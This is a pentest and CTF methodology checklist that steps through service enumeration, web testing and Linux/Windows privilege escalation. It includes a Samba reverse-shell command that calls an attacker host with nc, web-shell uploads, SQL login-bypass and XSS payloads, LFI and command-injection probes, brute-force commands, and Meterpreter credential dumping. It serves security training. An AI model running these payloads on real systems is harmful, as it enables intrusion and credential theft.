HackFlow "The Process"

Documenting the process

more at apt-secure.ca


General Data:

  • wordlists in kali

    • /usr/share/metasploit-framework/data/wordlists

    • /usr/share/wordlists

      • /usr/share/wordlists/rockyou.txt <-- popular

      • /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt <--popular

  • python script for determining use of random port assignments link

  • GTFOBins:

    • "a curated list of unix binaries that can be used to bypass local security restrictions in misconfigured systems"

      • cannot overstate how valuable this resource is

  • Power Usage nmap:

    • searching for vulns for particular service

      • #ls /usr/share/nmap/scripts/ | grep smb | grep vuln

      • followed by

      • #nmap -p 139 --script "smb*" <IP> -oN <outputfilename>.txt

  • Finding files on target

    • #find / -name <filename_and_extension> 2>/dev/null

      • #find / -name "*backup*" 2>/dev/null

    • #find /home/ -type f -size 1033c -name "file_name.*"

  • #find / -type f -user root

  • #find / -type f -group root

  • read a file whose name begins with "-" (redirection avoids the name being parsed as an option)

    • #cat < -file.txt


Binwalk is a tool for searching a given binary image for embedded files and executable code.

  • #binwalk -e <file>

Beginning of Hack Flow

  • VPN on?

  • Have you switched VPN locations?

  • are you using proxychains? link1 link2 link3

  • ping target

    • yes: continue

    • no: check connection

      • try port scans with -sA; experiment with -Pn and -n

      • go back and check network

      • be aware that you may still have a connection; a firewall could be dropping ICMP packets

Initial Interaction

  • Consider adding target IP to /etc/hosts for expedited work (so you are not typing the IP address in a ton)


  • #nmap -sS -T4 target

    • save results. I do this first to get a general idea of what I am looking at

  • #nmap -sU -sV --top-ports 20 <IP>

    • many services utilize UDP. If you don't do a UDP scan you will miss them

  • #nmap -vv --reason -Pn -A --osscan-guess --version-all -p- <IP>

  • #nmap -sV -sC target

    • grab service versions and any initial default script output

  • #nmap -sV --script vulners.nse target

    • this can come back with a ton of information. Can feel like a shotgun approach however it can provide good direction

    • output can be large --> recommended to write it to a file (-oN)

  • Leverage the entire vuln database of nmap

    • #nmap --script vuln <IP>

    • /usr/share/nmap/scripts/script.db --> a local DB that lists all the vulnerability checks and exploit scripts available to nmap

    • see "General Data" for power usage

  • Put IP in URL, attempt to connect. Use discovered ports.

    • Dealing with a WebApp? Go to "WebApp" below

  • Searching Kali for discovered services

Add IP to /etc/hosts so you can use a given name in our pentest


reference link

initial interaction

We want to find information such as the domain name.

is DNS answering on TCP as well as UDP? (DNS exposed on TCP 53 is a misconfiguration worth noting)

banner grab

  • #nmap -sSU -p 53 --script dns-nsid a.htb

Domain info gathering

  • #nslookup

  • #server <IP>

  • #<IP>

zone transfer (add the domain to /etc/hosts)

  • #dig axfr <domain name> @<IP>

    • if the zone transfer works:

      • add new nameservers to your /etc/hosts

      • subdomain brute force

        • #gobuster dns -d <domain name> -w /usr/share/wordlists/all_dns.txt -t 100

          • huge subdomain list can be found here link

          • DNS SecLists link (I use bitquark-subdomains-top100000.txt)

other nmap

  • #nmap --script fcrdns <IP>

  • #nmap --script dns-srv-enum <IP>

  • #nmap --script dns-random-txid <IP>

  • #nmap --script dns-random-srcport <IP>

  • Enumeration

    • dnsenum <domain>

    • dnsrecon -d <domain>

Fix: your client may not be set up to work with older SMB versions; allow it to do so.

add the above line to /etc/samba/smb.conf


Finger is a program used to find information about computer users. It can list login name, full name, and potentially other details about users. Default port is 79.


Banner Grab

  • #nc -vn <IP> 79

  • #echo "root" | nc -vn <IP> 79


Use multiple options; metasploit doesn't always catch every name. Additionally, the quality of your wordlist makes a difference. Use SecLists.

  • ./finger-user-enum.pl -U /opt/SecLists/Usernames/Names/names.txt -t <IP>


  • #finger <username>@<IP>


  • #use auxiliary/scanner/finger/finger_users


  • general connect (banner grabbing). You can find out the service version easily

    • #ftp <IPADDR>

  • test anonymous login link

    • This will feed you directory listings.

      • #nmap -sV -sC <IPADDR> -p21

  • Try to login

    • #ftp <IPADDR> 21

      • use some default creds like

        • anonymous/anonymous

        • admin/admin

        • root/root

        • empty/empty

        • Anonymous allowed?

          • yes (follow these steps, or continue down to "Access Gained")

            • examine all available files for critical info (creds)

            • use #ls -la to determine if you have C:\ access (windows)

            • Do you have C:/ access?

              • yes

                • continue to FTP Priv Escalation

          • no

            • you can attempt brute force

              • metasploit anonymous login check link

              • ftp brute force


Access Gained:

  • this means that you either are able to log in with acquired user credentials or can navigate with anonymous

  • The FTP may have nothing of value, however depending on what is in there you may want to consider uploading a file (like a web shell)

    • video demo

    • ASP.NET present?

    • from attacker (method 1)

      • #locate cmd.aspx

      • #cp <path/file> <wherever_you_want_it>

      • connect with ftp

      • #put <file>

      • open browser on attacker

        • http://<IP>/<file you put>

        • worked?

          • yes

    • method 2 (upload reverse shell aspx)

      • follow link for instructions link


general ftp

client side commands link


Enumeration (resource)

  • #nmap -n -sV --script "ldap* and not brute" <IP>

  • Check for null credentials or if your credentials are correct

    • #ldapsearch -x -h <IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"

Local Enumeration -> Privilege Escalation


  • get users

    • #net users

    • Identify info on specific user

      • #net user <user name>

  • get hostname

    • #hostname

  • find groups

    • #whoami /groups

  • Retrieve all users

    • #wmic useraccount get name

  • look at user specific details (Are any users included in the admin group)

    • #net user <username>

  • look at networking (interfaces,routing table etc.)

    • #ipconfig /all

    • #route print

  • look at arp cache

    • #arp -a

  • look at network connections and firewall rules

    • #netstat -ano

    • #netsh firewall show state

  • Look at scheduled tasks (may need elevated permissions)

    • #schtasks /query /fo LIST /v

  • Map running processes to the services they host

    • #tasklist /SVC

  • look at systeminfo.exe

    • check out this page for power usage link

    • What kind of things are we looking for?

      • patches

      • OS Version

      • Original install time

      • BIOS Version

      • network cards (pivots)

  • Determine .NET versions

    • #reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"

    • Can also look up directories

      • #cd c:\Windows\Microsoft.NET\Framework

      • #dir

  • Find third party drivers

    • #driverquery /v

  • check AppData

    • cd C:\Users\<username>\AppData\

      • ..\Roaming

Post Exploitation (Meterpreter)

  • You have exploited the machine and have a meterpreter shell

  • load kiwi extension try to get credentials

  • #load kiwi

  • kiwi commands

    • creds_all: retrieve credentials

    • creds_kerberos

    • creds_msv

    • creds_ssp

    • creds_tspkg

    • creds_wdigest

    • dcsync: retrieve user account info via dcsync

    • dcsync_ntlm

    • golden_ticket_create: create a golden kerberos ticket

    • kerberos_ticket_list

    • kerberos_ticket_purge

    • kiwi_cmd

    • lsa_dump_sam

    • lsa_dump_secrets

    • password_change

    • wifi_list: list wifi profiles/creds for current user

    • wifi_list_shared

  • obtained an account password?

    • yes

      • attempt remote login


  • Important scripts: linPEAS.sh / linux-exploit-suggester.pl > Instructions here

  • important commands

    • whoami/id/hostname/uname/pwd/ifconfig/ip/netstat/ss/ps/who/env/lsblk/lsusb/lsof/lspci/hostname

  • Look at history

    • #history

  • If history shows that a particular application has been run, check whether it is currently running with #ps aux | grep <pattern>. The application could be running as root

    • Patterns to check

      • "-exec"

      • "root"

  • print system info

    • #uname -a

  • kernel release

    • #uname -r

  • find users with group "0"

    • #grep 'x:0:' /etc/passwd

  • look at scheduled tasks

    • #crontab -l


  • #cat ~/.bash_history

  • #cat /etc/passwd

  • #cat /etc/shadow

"find" Power Usage

  • #find / -name <filename_and_extension> 2>/dev/null

  • #find -type f -name "*.bak" 2>/dev/null

  • #find -type f -name "*.log" 2>/dev/null

get OS info

  • #(cat /proc/version || uname -a ) 2>/dev/null

  • get ENV variables (they can contain secrets such as API keys)

    • #(env || set) 2>/dev/null

find SUID binary

SUID binary exploitation involves a binary with its SUID bit set, so the program runs with the privileges of the file owner (often root) rather than those of the user who launched it. Research each application that comes up.

  • #find / -perm -4000 2>/dev/null

    • Find SUID

      • #find / -perm -u=s -type f 2>/dev/null

    • Find SGID

      • #find / -perm -g=s -type f 2>/dev/null

Discover established connections (PORT) reference

#cat /proc/net/tcp
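The raw /proc/net/tcp table is hard to read because addresses, ports and states are hex fields. As an added example (not part of the original HackFlow page), this parser decodes a constructed sample into readable connections; responders use the same decoding when a box has no netstat or ss. It assumes a little-endian host, which is how the kernel writes the address field on x86.

```python
import socket
import struct

# Kernel TCP state codes as they appear in the "st" column of /proc/net/tcp
TCP_STATES = {
    "01": "ESTABLISHED", "02": "SYN_SENT", "03": "SYN_RECV", "04": "FIN_WAIT1",
    "05": "FIN_WAIT2", "06": "TIME_WAIT", "07": "CLOSE", "08": "CLOSE_WAIT",
    "09": "LAST_ACK", "0A": "LISTEN", "0B": "CLOSING",
}

# Constructed sample of /proc/net/tcp (not captured from a real host):
# a loopback listener on 631, an inbound SSH session from 10.0.2.100,
# and an unprivileged (uid 1000) service listening on 8080.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:0277 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 19123 1 0000000000000000 100 0 0 10 0
   1: 0F02000A:0016 6402000A:C3B2 01 00000000:00000000 02:0001A2B3 00000000     0        0 20456 4 0000000000000000 20 4 30 10 -1
   2: 00000000:1F90 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 21789 1 0000000000000000 100 0 0 10 0
"""


def decode_addr(hexaddr):
    """Turn 'AABBCCDD:PPPP' into ('d.c.b.a', port).

    The kernel writes the IPv4 address as a 32-bit integer in host byte
    order, so on little-endian hardware the octets come out reversed
    (assumption: the table came from a little-endian machine).
    """
    ip_hex, port_hex = hexaddr.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)


def parse_proc_net_tcp(text):
    """Parse the table into a list of dicts, skipping the header line."""
    rows = []
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0] == "sl":
            continue
        rows.append({
            "local": decode_addr(fields[1]),
            "remote": decode_addr(fields[2]),
            "state": TCP_STATES.get(fields[3], "UNKNOWN(%s)" % fields[3]),
            "uid": int(fields[7]),      # owner of the socket
            "inode": int(fields[9]),    # matches /proc/<pid>/fd/* -> socket:[inode]
        })
    return rows


def established(rows):
    """Sockets with a live peer: the connections this section asks you to discover."""
    return [r for r in rows if r["state"] == "ESTABLISHED"]


def listening(rows):
    """Listening sockets as (port, uid) pairs, e.g. to spot services running as root."""
    return [(r["local"][1], r["uid"]) for r in rows if r["state"] == "LISTEN"]


if __name__ == "__main__":
    parsed = parse_proc_net_tcp(SAMPLE_PROC_NET_TCP)
    for r in established(parsed):
        print("%s:%d <-> %s:%d (uid %d)" % (r["local"] + r["remote"] + (r["uid"],)))
    print("listening:", listening(parsed))
```

To run it against a live host, replace SAMPLE_PROC_NET_TCP with the contents of /proc/net/tcp; the inode column ties each socket back to a process via /proc/<pid>/fd.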

World writable Scripts invoked as root

  • if you find a script that is owned by root but is writable by anyone you can add your own malicious code

  • World-writable directories

    • #find / -writable -type d 2>/dev/null

    • #find / -perm -222 -type d 2>/dev/null

    • #find / -perm -o=w -type d 2>/dev/null

  • World executable folder

    • #find / -perm -o=x -type d 2>/dev/null

  • World writable and executable folders

    • #find / \( -perm -o=w -perm -o=x \) -type d 2>/dev/null

  • examine file capabilities (start at the root " / ")

    • #getcap -r / 2>/dev/null

      • if you find cap_setuid as a binary go here


  • link showing early steps (including steps below for RPC)

    • follow link above to see instructions on grabbing /etc/passwd and /etc/shadow and using JTR to crack password

    • additionally there are further instructions on adding yourself to sudoers (priv escalation)

  • RPC Bind Hack (potentially port 111)

    • #nmap -p111 --script "nfs*" <IP>

    • Do you see a mount point?

      • yes

        • make a directory: #mkdir myDemo

        • #sudo mount -o nolock <IP>:<mount_point> <location_of_myDemo>

        • if successful you can now navigate to this share


  • Exploit tutorial here

  • from nmap scan you have open

    • 139/445 netbios-ssn

    • 445/1433 typically associated with file sharing (SMB)

    • get version

  • searching for vulns for particular service

    • #ls /usr/share/nmap/scripts/ | grep smb | grep vuln

  • nmap scan

    • #nmap -p 139 --script "smb*" <IP>

      • could take time because it is running all the smb scripts available

  • enumerate users

    • #nmap --script smb-enum-users.nse -p445 <IP>

  • enumerate shares

    • #nmap --script smb-enum-shares.nse -p445 <IP>

    • variation of above scan

      • #nmap -p 445 -Pn -n --open --script=smb-enum-users --script-args=smbnoguest <IP>

  • Brute

    • #hydra -L usernames.txt -P /usr/share/wordlists/rockyou.txt <IP> smb

  • Attempt a mapping first (list shares)

    • #smbmap -H <IP>

    • try this as well; a bogus user/password such as "0xdf" returns an error code

      • #smbmap -H a.htb -u "0xdf" -p "0xdf"

  • use rpcclient to check for Null Sessions

    • #rpcclient -U "" -N <IP>

  • Gather more information with enum4linux

    • #enum4linux -a target_ip

  • Check for remote shares

    • #smbclient -L //target_ip

      • if it shows you shares, this is good!

  • Check anonymous access

    • #smbclient -N -L \\\\IP\\

      • anonymous allowed?

        • yes(linux)

          • look at the shares and pick one; do this for all of them (ex. backups)

            • #smbclient -N \\\\IP\\backups

            • #smbclient -N //<IP>/<share_name>

              • can you connect to the share?

                • yes

                  • attempt reverse shell

                  • set up listener on attacker #nc -nlvp 4444

                  • while connected to smb --> #logon "/=`nc <attacker IP> 4444 -e /bin/bash`"

    • Vuln Discovery

      • #nmap -p 445 --script vuln a.htb

    • Credentials acquired?

      • yes

        • #smbmap -H <IP> -u name_of_user -p "this is the password use escape for special characters"

        • you can navigate through discovered drives

        • #smbmap -H <IP> -u name_of_user -p "password\!\!" -r C$

          • in the above sample the C:\ drive was discovered to be Read/Write

        • smbclient connect

          • #smbclient \\\\IP\\DIRECTORY -U <username>%<password>

        • Use evil-winrm

          • #gem install evil-winrm

          • #evil-winrm -i <IP> -u <username> -p '<password>'

            • available commands when successful

              • upload/download/services/menu

            • enumerate through windows services (see bottom of page)

    • upload

      • curl --upload-file <file> -u '<user>' smb://<IP>/<sharename>/


General SAMBA



SNMP (simple network management protocol)

service discovery

  • #nmap -sU -sV --top-ports 20 <IP>


  • #nmap <IP> -Pn -sU -p 161 --script=snmp-brute

  • #nmap <IP> -Pn -sU -p 161 --script=snmp-interfaces


  • #snmpwalk -c public <IP> -v1 >> snmpwalk_output.txt

  • #cat snmpwalk_output.txt | grep STRING


Brute Force

  • #hydra -s 2222 -l <username> -P <path to wordlist> <IP> -t 4 ssh

    • -l = single user name

      • -L = to use word list for user names

    • -P = path to wordlist

    • -t 4 number of threads (brute force can take a long time, so leverage your resources)

    • -s = changing the port(not all ssh is 22, default for hydra is 22)

  • If you have acquired an RSA private key file, attempt to crack its passphrase


Try telnet on different ports

Brute Force (metasploit)

  • Process can be extremely long. You are better served to attempt to enumerate existing users and brute on that list.

  • # use auxiliary/scanner/telnet/telnet_login

    • #set rhosts <IP>

    • #set pass_file /usr/share/wordlists/rockyou.txt

    • #set user_file /Seclists-master/Usernames/Names/names.txt

    • #set threads 3 (or more if you want)

    • #run


Information Gathering

  • dealing with tomcat?

  • No matter what web application you are working with. Go and find the default credentials and try them out

  • Look at page source-->does anything jump out?

  • Conduct information gathering

    • click on everything and observe changes in the URL.

    • modify the URL and see if anything changes.

  • for each open web port, open a browser and enter <IP>:<port>

  • navigate around to all pages

  • insert a single quote (') into form fields to see if it is trivially vulnerable to SQL injection

  • attach "/sites/" to end of IP to see if you see anything

  • See if any errors are thrown with netcat

    • #nc <IP> 80

    • GET / HTTP/1.0 (then press Enter twice to end the request)

  • Additionally you can use curl to the same end

  • use ZAP to crawl and to investigate GET and POST

    • doesn't find everything, but is a good initial interaction with webapp.

    • ZAP also has Alerts which can potentially point you the right direction

  • connect to the webapp through Burp Suite and step through it with the proxy. Observe all GET and POST requests

  • in terminal run

    • #whatweb target.url -> this will tell you technologies/services associated with the site

  • Vulnerability Scanning

  • #nikto -h target_ip

    • put header info into google > " "header_info" cve"

  • Vulnerability scan with nuclei (found on tools page)

    • #nuclei -u http://<IP> 130

  • Check for Web Application Firewall Fingerprinting

    • wafw00f

      • #wafw00f http://<IP>

  • Directory Enumeration

    • nmap scan

      • nmap --script http-enum -v -p80 <IP>

    • DIRB

      • #dirb http://xyz.com -r -z 10

        • -r = don't recurse

        • -z = 10 millisecond delay

      • use "dirbuster" gui> look at tools for set up

    • Gobuster

    • gobuster cheat sheet link

    • after you discover directories put the new data into URL and click on everything

    • use different wordlists (/usr/share/wordlists); download more if needed

    • wordlists that have worked (take note that this is brute force, so the size of the file increases the options attempted)

      • /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

      • /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

      • as you find more directories "/wordpress" etc. enumerate the new directory

    • #gobuster dir -u http://<IP> -w /usr/share/wordlists/YOUR_WORD_LIST_OF_CHOICE.txt -t 100

      • additional switches to add (being specific can help you discover exposed directories faster)(if you know that php is present run the command below!)

        • #gobuster dir -u http://<IP> -w /usr/share/wordlists/WORDLIST.txt -e -s "200,301,302,401" -x "php" -t 100

          • -x specifies extensions

          • -s status codes to accept

          • -e expanded mode that prints the full URL

          • #gobuster dir -u http://<IP> -w /usr/share/wordlists/WORDLIST.txt -x html,txt,php -t 100

      • Webservers can have multiple virtual hosts

        • discover other virtual hosts

        • #gobuster vhost -u http://<name>.htb -w /usr/share/wordlists/subdomain_list.txt -t 150

          • you need to have a subdomain wordlist to make this work go here for lists

  • WebDAV

  • Test for WebDAV (link). WebDAV is an extension of HTTP that allows clients to perform remote web content authoring.

    • run this scan

    • #nmap --script http-webdav-scan -p80,8080 a.htb

    • using metasploit

      • #use scanner/http/webdav_scanner

        • #set rhosts

        • #set path

        • #run

      • #use scanner/http/options

        • #set rhosts

        • #run

    • run davtest (tests to see what kinds of files can be uploaded)

      • #davtest -url http://<IP> (davtest can be wonky; however, if your scanner returned positive for WebDAV it is worth further digging)

      • #cadaver <ip> (a command-line WebDAV client)

        • commands (ls/cd/get/mget/put/mput)

        • access gained?

          • yes

      • You can use curl to upload files to a webdav vulnerable site link

    • Test for Heartbleed

      • #nmap -p 443 --script ssl-heartbleed <IP>

    • Wordpress

      • #wpscan --url http://<IP>

      • #wpscan --url http://<IP> -e ap,t,tt,u

      • ap = all plugins

      • t= themes

      • tt=timthumbs

      • u=users

    • Check default plugins folder in URL

    • Check for xmlrpc.php vulnerability

      • can be discovered through directory enumeration but also by putting xmlrpc.php at the end of the URL

      • reference here

Testing User Inputs

  • Try manual testing SQL injections (see below)

  • open up "inspect element">network>click submit button with data in fields >observe any changes

  • manually testing inputs is first step but it could be time to use burpsuite

  • open BurpSuite>start proxy browser(intercept on)>step through website and observe changes (link)

    • POST has base64 data?

  • Test Command Injection

    • php may be working in the background

    • try putting a ; at the end of the known good input and putting a command like ;whoami

      • without proper sanitization you can potentially be shown data you shouldn't know

        • #cat /etc/passwd

        • #cat /etc/shadow

        • #ls /

  • Test Stored XSS Vuln

    • Use javascript special characters to see if you can cause an error, or test whether they are allowed, which means we could be looking at an XSS

      • ";<>

      • "

      • <

      • >

      • ;

      • also

      • <script>alert('XSS')</script>

  • Cookie Forgery

    • You could have an opportunity for Cookie forgery. Follow video link for BASIC cookie session forgery

Access Gained

What is in /var/www? Does your current user have control of this directory? Can you upload anything that could escalate privileges?

  • consider the python httpserver in tools

  • check permissions #ls -la

  • do local enumeration (linux/windows): which binaries run at an admin level?

SQL Injections Manual

Manual Checking

  • open firefox

  • right click submit button>inspect element

    • network>All>form data

    • document the format for the form

    • attempt brute force (see hydra for basic usage)

    • #hydra -V -L <user_wordlist> -P <pass_wordlist> admin.cronos.htb http-post-form "/:username=^USER^&password=^PASS^:invalid"

Manual Testing (both user/pass, user only, pass only) link

Login Bypass

  • admin' --

  • admin' -- -

  • admin' #

  • admin'/*

  • ' or 1=1--

  • ' or 1=1#

  • ' or 1=1/*

  • ') or '1'='1--

  • ') or ('1'='1--

  • user' or 1=1;#

  • user' or 1=1 LIMIT 1;#

  • user' or 1=1 LIMIT 0,1;#

Finding Command Execution

  • you have found a form that sends a command.

    • is target OS Linux?

      • yes

        • stack a command onto the end of an expected command

          • put a ";" (semicolon) at the end of command and put "whoami" see what happens

terminal in browser

  • grab list of any/all users

    • #cat /etc/passwd

      • you may need to switch users

  • depending on user permissions

    • get python version

      • $whereis python

    • poke around for user flag

    • run #sudo -l (this will tell you what commands you can do)

    • attempt python priv escalation from terminal link

    • be aware that more is available to you with an upgraded shell. here are instructions to upgrade your shell using python link

SQL Injections Automated

Check whether a database is running. The commands below also check whether the webapp is vulnerable to SQLi.

#sqlmap -u http://<IP> --dbs --batch

#sqlmap -u http://<IP>:8080 --dbs --batch ---> adjust to the port the webserver is on

#sqlmap -u http://<IP>/specific_location/ --dbs --batch

Discovered database(s)

#sqlmap -u http://<IP> -D <database_name> --dump-all --batch


you have a php page and you suspect that it accepts a GET or POST parameter. (resource)

you can discover a parameter by brute force with wfuzz

#wfuzz -u http://<IP>/<suspect_page>.php?FUZZ=/etc/passwd -w /Seclists-master/Discovery/Web-Content/burp-parameter-names.txt -t 50 --hh 0

**parameter discovered?

  • yes

    • in your browser

      • #http://<IP>/<suspect_page>.php?<discovered_parameter>=/etc/passwd

      • did it work?

        • yes

          • great

        • no

          • request the file base64-encoded through the php filter wrapper, then decode the output

            • #http://<IP>/<suspect_page>?<parameter>=php://filter/convert.base64-encode/resource=/etc/passwd